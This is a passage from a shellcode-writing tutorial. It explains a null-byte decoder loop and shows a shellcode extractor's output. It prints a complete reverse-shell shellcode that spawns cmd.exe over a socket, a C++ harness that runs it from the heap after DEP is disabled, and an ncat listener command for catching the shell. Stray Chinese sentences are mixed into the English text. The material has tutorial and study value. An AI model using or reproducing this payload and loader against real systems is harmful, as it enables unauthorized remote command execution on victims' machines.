loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we're done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair...
  INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:
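The two loops are easier to follow as a model. The following Python function (hypothetical name `decode_in_place`) mirrors loop1/loop2 on a bytearray:

- EBX walks bytes_blocks two entries at a time.
- EDX counts the 254 * num_blocks bytes of the current group.
- ECX counts down the total length.
- Any byte equal to the group's missing byte becomes 0.

It is only a sketch for understanding, assuming length > 0 as in the real decoder, and it works on offsets rather than addresses.

```python
from typing import List

CHUNK = 254  # MOV AL, 0FEh


def decode_in_place(data: bytearray, bytes_blocks: List[int], length: int) -> bytearray:
    """Model of loop1/loop2: restore the null bytes of data[:length]."""
    edi = 0       # offset of the current shellcode byte (EDI)
    ebx = 0       # offset of the current (missing_byte, num_blocks) pair (EBX)
    ecx = length  # bytes left in the whole shellcode (ECX); assumed > 0
    while True:                                   # loop1
        edx = CHUNK * bytes_blocks[ebx + 1]       # MUL / MOVZX: bytes in this group
        while True:                               # loop2
            if data[edi] == bytes_blocks[ebx]:    # CMP AL, BYTE PTR [EBX]
                data[edi] = 0                     # CMOVE EAX, ESI + STOSB
            edi += 1                              # STOSB advances EDI
            ecx -= 1
            if ecx == 0:                          # JE shellcode_begin
                return data
            edx -= 1
            if edx == 0:                          # group finished, go back to loop1
                break
        ebx += 2                                  # INC EBX; INC EBX
```

For instance, with bytes_blocks = [3, 1, 1, 1], the 0x03 bytes in the first 254 bytes are turned back into nulls. In the next group, the 0x01 bytes are restored instead.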

Testing the script

This part is easy! If we run the script without any arguments, it displays:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
  sce.py <exe file> <map file>

如果你还记得,我们也已经告诉过VS 2013linker生成一个映射文件。只调用具有exe文件及映射文件路径的脚本。此处是从反向shellcode中得到的信息:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

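The information about relocations is important because it lets us check that everything is OK. For instance, we know that our reverse shell uses 3 strings, and all three were extracted from the .rdata section. We can also see that the original shellcode was 614 bytes long and that the resulting shellcode (after handling relocations and null bytes) is 715 bytes long.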
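The printed bytes can be cross-checked against these numbers. This sketch assumes that the first 34 bytes are the single-block decoder stub from the previous part. That stub is CALL $ + 4, POP EDI, MOV ECX / XOR ECX and ADD EDI, followed by a CMP AL, imm8 / CMOVE / STOSB / LOOP loop. The Python below reads the encoded length and the byte that stands in for 0x00. The helper names and the hard-coded offsets are assumptions based on that layout.

```python
# First 34 bytes of the shellcode printed above (assumed decoder stub).
STUB = bytes.fromhex(
    "e8ffffffffc05f"                  # CALL $ + 4; (FF)C0 = INC EAX; POP EDI
    "b9a8030101"                      # MOV ECX, 010103A8h
    "81f101010101"                    # XOR ECX, 01010101h
    "83c71d"                          # ADD EDI, 1Dh
    "33f6fc8a073c050f44c6aae2f6"      # XOR ESI,ESI; CLD; MOV AL,[EDI]; CMP AL,5; CMOVE; STOSB; LOOP
)

# Last 29 bytes of the printed shellcode: the strings taken from .rdata.
TAIL = bytes.fromhex("7773325f33322e646c6c05" "636d642e65786505" "3132372e302e302e3105")


def parse_stub(stub: bytes):
    """Return (payload length, payload offset, substitute byte) from the stub."""
    mov_imm = int.from_bytes(stub[8:12], "little")    # operand of MOV ECX
    xor_imm = int.from_bytes(stub[14:18], "little")   # operand of XOR ECX
    payload_len = mov_imm ^ xor_imm                   # ECX after the XOR
    here = 5                                          # offset pushed by the CALL
    payload_start = here + stub[20]                   # ADD EDI, imm8
    missing_byte = stub[27]                           # CMP AL, imm8
    return payload_len, payload_start, missing_byte


def restore_nulls(data: bytes, missing_byte: int) -> bytes:
    """What the stub's loop does to each byte: missing_byte -> 0x00."""
    return data.replace(bytes([missing_byte]), b"\x00")


payload_len, payload_start, missing = parse_stub(STUB)
print(payload_len, payload_start, missing)
print(restore_nulls(TAIL, missing).split(b"\x00")[:3])
```

The stub yields a 681-byte payload starting at offset 34, and 34 + 681 = 715 matches the final length reported above. It also yields 0x05 as the substitute for null bytes. Decoding the tail gives the three strings listed by the script.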

Now we need to run the resulting shellcode. Here's the full source code:

#include <cstring>
#include <cassert>
 
// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)
 
int main() {
    char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
        "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
        "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
        "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
        "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
        "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
        "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
        "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
        "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
        "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
        "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
        "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
        "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
        "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
        "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
        "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
        "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
        "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
        "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
        "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
        "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
        "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
        "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
        "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
        "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
        "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
        "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
        "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
        "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
        "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
        "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
        "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
        "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
        "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
        "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
        "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";
 
    static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");
 
    // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}

For this code to work, you need to disable DEP (Data Execution Prevention). Go to Project→<solution name> Properties and then, under Configuration Properties, Linker → Advanced, set Data Execution Prevention (DEP) to No (/NXCOMPAT:NO). This is necessary because the shellcode will be executed from the heap, which DEP would prevent.
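You may want to verify that the linker setting took effect. /NXCOMPAT is recorded in the IMAGE_DLLCHARACTERISTICS_NX_COMPAT bit (0x0100) of the DllCharacteristics field of the PE optional header. That field sits at offset 0x46 from the start of the optional header, for both PE32 and PE32+. The following Python sketch reads that bit from the raw bytes of an executable. The function name is hypothetical, and it does only minimal validation. A system-wide DEP policy such as AlwaysOn can still enforce DEP regardless of this flag.

```python
import struct

IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100


def nx_compat_enabled(pe: bytes) -> bool:
    """Return True if the PE image was linked with /NXCOMPAT."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)      # offset of "PE\0\0"
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    optional_header = e_lfanew + 4 + 20                   # skip signature + IMAGE_FILE_HEADER
    (dll_chars,) = struct.unpack_from("<H", pe, optional_header + 0x46)
    return bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
```

Usage, with a hypothetical file name for the test program: `nx_compat_enabled(open("run_shellcode.exe", "rb").read())` should return `False` once /NXCOMPAT:NO is set.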

static_assert, introduced in C++11 and supported by the VS 2013 CTP compiler, is used here to check that we wrote

char shellcode[] = "..."

instead of

char *shellcode = "..."

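In the first case, sizeof(shellcode) is the actual length of the shellcode (plus the terminating null), and the shellcode is copied onto the stack. In the second case, sizeof(shellcode) is just the size of the pointer (i.e. 4 in a 32-bit build), and that pointer points to the shellcode in the .rdata section.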
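Python's ctypes module shows the same array-versus-pointer distinction, which makes it easy to try out. `ctypes.create_string_buffer(data)` allocates a char array one byte longer than `data`, like `char shellcode[] = "..."`. `ctypes.c_char_p` is just a pointer. The helper name below is hypothetical, and the sketch is only an analogy to the C++ code, not part of the tool.

```python
import ctypes


def array_and_pointer_sizes(data: bytes):
    """Return (sizeof array copy, sizeof pointer) for the same bytes."""
    as_array = ctypes.create_string_buffer(data)   # like: char shellcode[] = "...";
    as_pointer = ctypes.c_char_p(data)             # like: char *shellcode = "...";
    return ctypes.sizeof(as_array), ctypes.sizeof(as_pointer)


print(array_and_pointer_sizes(b"\xe8\xff\xff\xff\xff"))
```

The first value is 6 (five bytes plus the terminating null). The second is the pointer size: 4 in a 32-bit Python and 8 in a 64-bit one.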

可以打开cmd shell来测试shellcode

ncat -lvp 123

Then run the shellcode and see whether it works.

